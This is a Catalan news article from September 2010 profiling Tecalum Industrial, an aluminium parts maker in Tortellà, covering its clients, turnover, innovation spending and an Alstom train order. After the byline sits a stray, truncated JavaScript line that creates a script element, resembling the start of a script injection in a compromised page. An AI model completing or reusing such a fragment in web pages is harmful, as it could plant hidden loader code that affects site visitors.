Tecalum, alumini per a l’alta velocitat europea

L’empresa Tecalum Industrial, de Tortellà i la innovació.

Nascuda fa vint anys, l’empresa Tecalum Industrial de Tortellà s’ha consolidat en el mercat competitiu internacional de les peces d’alumini de qualitat, adreçades a sectors que són exigents pel que fa a la tecnologia com són els del ferrocarril, l’automoció o bé de les energies renovables, entre d’altres.

Qui hagi viatjat en algun tren d’alta velocitat europeu és molt probable que n’hagi vist la porta o que s’hagi assegut en un seient que té una estructura fabricada per aquesta factoria, que és de la Garrotxa. Passa el mateix amb els cotxes, els marcs de les plaques solars, els components de les piscines d’hidromassatge, els panells de les carreteres o els mobles. Alstom, Roca, IKEA, Volvo o Peugeot són alguns dels seus clients. En la planta de Tortellà, s’hi transformen cap a 4.000 tones d’alumini anualment, i hi treballen 95 persones. L’any passat van facturar pels volts d’11 milions d’euros, el 60% dels quals a l’estranger, sobretot a països de la UE –especialment França, on Tecalum ha tingut molta tirada des del principi– però també als EUA i al nord d’Àfrica. El 40% del mercat estatal correspon essencialment a Catalunya.

Inicialment, aquesta empresa concentrava la producció als perfilats típics per a la construcció (els marcs de portes i de les finestres, per exemple), però des de fa uns anys, de mica en mica ha anat diversificant els sectors de mercat i ha anat aplicant valor afegit al seu catàleg. Va passar de fabricar peces estàndard, que uns altres havien d’acabar per adaptar a les seves necessitats, a produir peces més elaborades, a punt per acoblar al producte final, ja sigui una cadira, un moble, una porta de tren o bé una llanta de roda de cotxe; va passar de concentrar les vendes a un ram –en aquest cas, el de la construcció–, a diversificar el tipus de client.

El conseller delegat de l’empresa, Marc Sansalvadó, explica que per aconseguir-ho han hagut de fer un esforç important en innovació, per estrènyer la relació amb el client i convertir-se en còmplice dels seus objectius. El canvi ha estat positiu perquè, tot i que van notar la sotragada, Tecalum ha sobreviscut a la davallada recent de la construcció gràcies a la diversificació de la clientela.

Com que fins ara els està sent molt positiu, enguany esperen que augmenti la facturació fins a 15 milions d’euros. Encara els faltarà molt per als 20 milions als quals havien arribat en èpoques passades, però Sansalvadó confia a assolir aquesta quantitat a curt termini. Entre els projectes en què està immers Tecalum Industrial, destaca –segons el conseller delegat– el de la fabricació d’unes peces per al tren nou de molta alta velocitat, de dos pisos, que Alstom ja prepara a França. Al maig, van començar a treballar en els plànols i tenen previst començar a lliurar la comanda a partir de l’octubre.

L’esforç notable en innovació –indispensable per atendre aquest tipus de client al qual es referia Sansalvadó– es plasma en el fet que Tecalum dedica a aquesta qüestió cap a 300.000 euros anuals. No hi ha cap àrea d’innovació pròpiament, sinó que el concepte s’ha implantat transversalment a totes les seccions. També ha calgut adquirir maquinària nova –en algun cas, fabricant models expressament per a ells– o també adaptant-ne d’existents però per a funcions noves. Per això, en els dos darrers anys s’han gastat pels volts d’1,5 milions d’euros.

Segons afirma el conseller delegat, la millora pel que fa al camp de les idees va ser tant o més transcendent que les millores en aspectes purament tangibles. Es refereix al fet que, paral·lelament a la inversió pel que fa al disseny o a la maquinària, també s’ha treballat molt en l’organització interna per extreure el màxim rendiment de l’estructura de l’empresa. “La idea és que hem de ser capaços de posar-nos al costat del client, mantenir-hi unes relacions molt estretes i, així, participar activament de la creació d’un nou producte seu”, resumeix Sansalvadó. En això, segons considera el màxim responsable de Tecalum, l’empresa de Tortellà té l’avantatge de ser “petita” i, per tant, molt flexible igual com també molt capaç d’adaptar-se als canvis que li pugui requerir el client.

19/09/10 02:00 – tortellà – Ramon Estéban

var d=document;var s=d.createElement(‘script’);

A Manlleu
Fem Xarxa